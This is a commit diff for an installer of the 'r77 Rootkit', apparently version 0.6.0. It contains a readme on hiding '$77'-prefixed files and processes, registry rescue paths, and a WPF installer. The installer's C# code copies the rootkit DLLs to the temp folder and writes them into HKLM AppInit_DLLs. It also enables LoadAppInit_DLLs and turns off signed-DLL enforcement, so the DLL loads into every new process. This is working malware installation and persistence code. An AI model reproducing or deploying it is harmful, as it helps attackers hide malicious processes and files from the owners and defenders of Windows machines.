0.6.0

!Docs/Examples/Readme.txt

@@ -0,0 +1,10 @@
+r77 Rootkit fill hide files and processes that start with "$77" (without the quotes)
+
+Example to test the effects:
+ 1. Run "$77-ExampleExecutable.exe"
+ 2. It's visible in Task Manager
+ 3. Install rootkit
+ 4. Restart Task Manager
+ 5. It's no longer visible in Task Manager
+ 6. Restart Explorer
+ 7. Guess what... It's hidden there, too.

!Docs/Rescue.txt

@@ -0,0 +1,2 @@
+Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
+Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows

!Docs/Restart Explorer.bat

@@ -0,0 +1,2 @@
+taskkill /f /IM explorer.exe
+start explorer.exe

.gitignore

@@ -0,0 +1,16 @@
+.vs/
+bin/
+obj/
+Debug/
+Release/
+ipch/
+TestResults/
+*.suo
+*.user
+*.sdf
+*.opensdf
+*.opendb
+*.VC.db
+[Tt]humbs.db
+
+$Build/

Install/App.xaml

@@ -0,0 +1,16 @@
+<Application
+	x:Class="Install.App"
+	xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+	xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+	xmlns:local="clr-namespace:Install"
+	StartupUri="MainWindow.xaml">
+	<Application.Resources>
+		<Style TargetType="{x:Type Image}">
+			<Setter Property="Stretch" Value="None" />
+		</Style>
+		<Style TargetType="{x:Type Button}">
+			<Setter Property="Padding" Value="15,5" />
+			<Setter Property="MinWidth" Value="75" />
+		</Style>
+	</Application.Resources>
+</Application>

Install/App.xaml.cs

@@ -0,0 +1,8 @@
+using System.Windows;
+
+namespace Install
+{
+	public partial class App : Application
+	{
+	}
+}

Install/Install.csproj

@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{751136EE-F31F-4FDB-BA60-2AD68356F1A0}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <RootNamespace>Install</RootNamespace>
+    <AssemblyName>Install</AssemblyName>
+    <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <ProjectTypeGuids>{60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
+    <WarningLevel>4</WarningLevel>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ApplicationManifest>app.manifest</ApplicationManifest>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.Xml" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xaml">
+      <RequiredTargetFramework>4.0</RequiredTargetFramework>
+    </Reference>
+    <Reference Include="WindowsBase" />
+    <Reference Include="PresentationCore" />
+    <Reference Include="PresentationFramework" />
+  </ItemGroup>
+  <ItemGroup>
+    <ApplicationDefinition Include="App.xaml">
+      <Generator>MSBuild:Compile</Generator>
+      <SubType>Designer</SubType>
+    </ApplicationDefinition>
+    <Page Include="MainWindow.xaml">
+      <Generator>MSBuild:Compile</Generator>
+      <SubType>Designer</SubType>
+    </Page>
+    <Compile Include="App.xaml.cs">
+      <DependentUpon>App.xaml</DependentUpon>
+      <SubType>Code</SubType>
+    </Compile>
+    <Compile Include="MainWindow.xaml.cs">
+      <DependentUpon>MainWindow.xaml</DependentUpon>
+      <SubType>Code</SubType>
+    </Compile>
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Properties\Resources.Designer.cs">
+      <AutoGen>True</AutoGen>
+      <DesignTime>True</DesignTime>
+      <DependentUpon>Resources.resx</DependentUpon>
+    </Compile>
+    <EmbeddedResource Include="Properties\Resources.resx">
+      <Generator>ResXFileCodeGenerator</Generator>
+      <LastGenOutput>Resources.Designer.cs</LastGenOutput>
+    </EmbeddedResource>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="app.manifest" />
+  </ItemGroup>
+  <ItemGroup>
+    <Resource Include="Resources\ImageBanner.png" />
+  </ItemGroup>
+  <ItemGroup>
+    <Resource Include="Resources\Install.ico" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <PropertyGroup>
+    <PostBuildEvent>mkdir $(SolutionDir)$Build
+xcopy /Y $(TargetPath) $(SolutionDir)$Build</PostBuildEvent>
+  </PropertyGroup>
+</Project>

Install/MainWindow.xaml

@@ -0,0 +1,43 @@
+<Window
+	x:Class="Install.MainWindow"
+	xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+	xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+	xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
+	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
+	xmlns:local="clr-namespace:Install"
+	mc:Ignorable="d"
+	Title="Install / Uninstall r77 Rootkit" Width="500" SizeToContent="Height" ResizeMode="CanMinimize" WindowStartupLocation="CenterScreen" Icon="/Install;component/Resources/Install.ico">
+	<Grid>
+		<StackPanel>
+			<Grid>
+				<Image Source="/Install;component/Resources/ImageBanner.png" />
+				<Label Content="Version 0.6.0" VerticalAlignment="Bottom" HorizontalAlignment="Right" />
+			</Grid>
+			<StackPanel Margin="20">
+				<TextBlock TextWrapping="Wrap">
+					<Run Text="r77 Rootkit will hide any" />
+					<LineBreak />
+					<Run Text="   • Processes" />
+					<LineBreak />
+					<Run Text="   • Files" />
+					<LineBreak />
+					<Run Text="That start with &quot;" /><Run Text="$77" FontWeight="Bold" /><Run Text="&quot; prefix." />
+					<LineBreak />
+					<LineBreak />
+					<Run Text="Currently, file hiding does not work in x86 processes (work in progress)." />
+					<LineBreak />
+					<LineBreak />
+					<Run Text="All x64 and x86 processes will be affected, but not already running ones. Restart taskmgr or explorer to see effect." />
+				</TextBlock>
+			</StackPanel>
+			<StackPanel>
+				<Border Background="#f8f8f8" BorderThickness="0,1,0,0" BorderBrush="#e7e7e7" Padding="10">
+					<StackPanel Orientation="Horizontal" HorizontalAlignment="Right">
+						<Button Content="Install" Margin="0,0,10,0" Click="btnInstall_Click" />
+						<Button Content="Uninstall" Click="btnUninstall_Click" />
+					</StackPanel>
+				</Border>
+			</StackPanel>
+		</StackPanel>
+	</Grid>
+</Window>

Install/MainWindow.xaml.cs

@@ -0,0 +1,70 @@
+using Microsoft.Win32;
+using System;
+using System.IO;
+using System.Windows;
+
+namespace Install
+{
+	public partial class MainWindow : Window
+	{
+		public MainWindow()
+		{
+			InitializeComponent();
+		}
+
+		private void btnInstall_Click(object sender, RoutedEventArgs e)
+		{
+			try
+			{
+				Install(true);
+				Install(false);
+
+				MessageBox.Show("r77 is now installed to AppInit_DLLs.", "Information", MessageBoxButton.OK, MessageBoxImage.Information);
+			}
+			catch (Exception ex)
+			{
+				MessageBox.Show(ex.GetType() + ": " + ex.Message + "\r\n" + ex.StackTrace, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
+			}
+		}
+		private void btnUninstall_Click(object sender, RoutedEventArgs e)
+		{
+			try
+			{
+				bool removed = false;
+
+				foreach (bool is64bit in new[] { true, false })
+				{
+					using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
+					{
+						if ((key.GetValue("AppInit_DLLs", "") as string).Contains("$77-"))
+						{
+							key.SetValue("AppInit_DLLs", "");
+							removed = true;
+						}
+					}
+				}
+
+				MessageBox.Show(removed ? "r77 was now removed from AppInit_DLLs." : "r77 was not found in AppInit_DLLs.", "Information", MessageBoxButton.OK, MessageBoxImage.Information);
+			}
+			catch (Exception ex)
+			{
+				MessageBox.Show(ex.GetType() + ": " + ex.Message + "\r\n" + ex.StackTrace, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
+			}
+		}
+
+		private void Install(bool is64bit)
+		{
+			string extension = "x" + (is64bit ? 64 : 86) + ".dll";
+			string destPath = Path.Combine(Path.GetTempPath(), "$77-" + Guid.NewGuid().ToString("N") + "-" + extension);
+			File.Copy(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "r77-" + extension), destPath);
+			new FileInfo(destPath).Attributes |= FileAttributes.Temporary;
+
+			using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
+			{
+				key.SetValue("LoadAppInit_DLLs", 1);
+				key.SetValue("RequireSignedAppInit_DLLs", 0);
+				key.SetValue("AppInit_DLLs", destPath);
+			}
+		}
+	}
+}